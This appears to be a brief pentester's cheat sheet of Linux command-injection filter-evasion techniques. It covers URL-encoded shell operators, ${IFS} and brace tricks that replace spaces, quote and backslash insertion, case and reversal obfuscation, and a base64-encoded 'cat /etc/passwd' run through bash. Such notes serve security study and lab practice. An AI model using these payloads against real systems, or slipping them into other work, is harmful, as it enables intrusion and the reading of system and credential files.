Notes

; : %3b

\n : %0a

& : %26

| : %7c

&& : %26%26

|| : %7c%7c

`` : %60%60

$() : %24%28%29

Linux

printenv

Spaces

%09 Using tabs instead of spaces

${IFS} Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())

{ls,-la} Commas will be replaced with spaces

${PATH:0:1} Will be replaced with /

${LS_COLORS:10:1} Will be replaced with ;

$(tr '!-}' '"-~'<<<[) Shift character by one ([ -> \)

Character Insertion

' or " Total must be eve

$@ or \ Linux only

Case Manipulation

$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") Execute command regardless of cases

$(a="WhOaMi";printf %s "${a,,}") Another variation of the technique

Reversed Commands

echo 'whoami' | rev Reverse a string

$(rev<<<'imaohw') Execute reversed command

Encoded Commands

echo -n 'cat /etc/passwd | grep 33' | base64 Encode a string with base64

bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) Execute b64 encoded string

Last updated 4 months ago